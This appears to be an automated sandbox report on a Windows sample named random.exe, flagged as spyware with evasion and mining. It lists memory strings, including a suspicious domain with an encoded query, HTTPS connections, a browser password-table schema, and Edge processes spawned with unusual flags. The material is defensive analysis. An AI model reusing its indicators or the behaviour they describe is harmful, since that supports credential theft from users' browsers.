Source: random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cdn.office.net/
Source: random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sapphire.azureedge.net
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b2?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.
Source: random.exe, 00000000.00000003.2254806673.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2257548362.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2219726288.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2283736711.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2206911795.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2271684344.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2223881250.000001D2EAA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sb.scorecardresearch.com/b?rn=1735943564647&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.m
Source: random.exe, 00000000.00000003.2205723262.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2238672250.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sn.com
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: random.exe, 00000000.00000003.2071090466.000001D2EAA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: random.exe, 00000000.00000003.2071090466.000001D2EAA22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: random.exe, 00000000.00000003.2071090466.000001D2EAA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: random.exe, 00000000.00000003.2071090466.000001D2EAA22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.ssl.ak.dynamic.tiles.virtualearth.net
Source: random.exe, 00000000.00000003.2027524600.000001D2E528B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/
Source: random.exe, 00000000.00000003.2027524600.000001D2E5230000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2011205859.000001D2E5237000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2019279215.000001D2E5230000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/sagesse_renaldo
Source: random.exe, 00000000.00000003.2028072122.000001D2E6C7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/sagesse_renaldo00.html
Source: random.exe, 00000000.00000003.2035915565.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tataragirld.site/sagesse_renaldo00.html?tdfgozllgbxxyj=yhIP6D%2BNM98rEr1pqaSoG1KWw5J7mExVtIz
Source: random.exe, 00000000.00000003.2227600722.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://titlehub.xboxlive.com/users/
Source: random.exe, 00000000.00000003.2151510942.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://user.auth.xboxlive.com/user/authenticate
Source: random.exe, 00000000.00000003.2224339020.000001D2E6C57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.clarity.ms
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
Source: random.exe, 00000000.00000003.2070148509.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: random.exe, 00000000.00000003.2167302230.000001D2E6C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/chromewebstore/v1.1/items/verify
Source: random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.microsoftstart.com
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: random.exe, 00000000.00000003.2356964294.000001D2EAC46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.cn
Source: random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/
Source: random.exe, 00000000.00000003.2284406480.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2255670925.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2166111394.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.nic.cz/odvr/har
Source: random.exe, 00000000.00000003.2183074050.000001D2EAAAA000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2299103289.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2220940803.000001D2EAA21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.quad9.net/home/privacy/
Source: random.exe, 00000000.00000003.2151510942.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2185683186.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2221478965.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2285866225.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmp, random.exe, 00000000.00000003.2272664847.000001D2EAA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/xsts/authorize
Source: random.exe, 00000000.00000003.2239960577.000001D2E6CB1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://zib.nel
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49911 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: random.exeStatic PE information: Number of sections : 11 > 10
Source: random.exe, 00000000.00000003.2286126023.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2285340825.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2166843964.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2183243518.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2220457848.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2273159384.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2257257638.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2240044461.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2154578247.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2270080363.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2270689057.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2148089097.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2318456924.000001D2E6C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2202949497.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2272417273.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2241725657.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2169489373.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2318642960.000001D2E6CAA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2298846054.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2206448334.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2298178818.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2284551934.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2312404183.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2285660581.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2256465718.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2259027190.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2188643666.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2300693729.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2301271733.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2240987100.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2182702715.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2283987870.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2166630639.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2238884592.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2240377316.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2222912824.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2299414578.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2227659960.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2220766163.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2271839884.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2344282731.000001D2E6CAE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2202438307.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2168292616.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2207134712.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2221134410.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2300277210.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2271181171.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2182899619.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2205465791.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: random.exe, 00000000.00000003.2204221298.000001D2E6C7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsedge.exe> vs random.exe
Source: classification engineClassification label: mal76.spyw.evad.mine.winEXE@61/344@25/14
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-67786583-1F3C.pmaJump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Temp\4e62ecb0-8011-4d69-97cc-92f963b45280.tmpJump to behavior
Source: random.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\random.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: random.exe, 00000000.00000003.2068698915.000001D2E6CD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: random.exeReversingLabs: Detection: 28%
Source: unknownProcess created: C:\Users\user\Desktop\random.exe "C:\Users\user\Desktop\random.exe"
Source: C:\Users\user\Desktop\random.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2056,i,4096293946836122851,18064520161421918287,262144 /prefetch:3
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2112 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6472 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6644 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7180 --field-trial-handle=2028,i,7732149979557383819,8147507276790023496,262144 /prefetch:8
Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=2128,i,5363486696268237516,2027687803800706912,262144 /prefetch:3
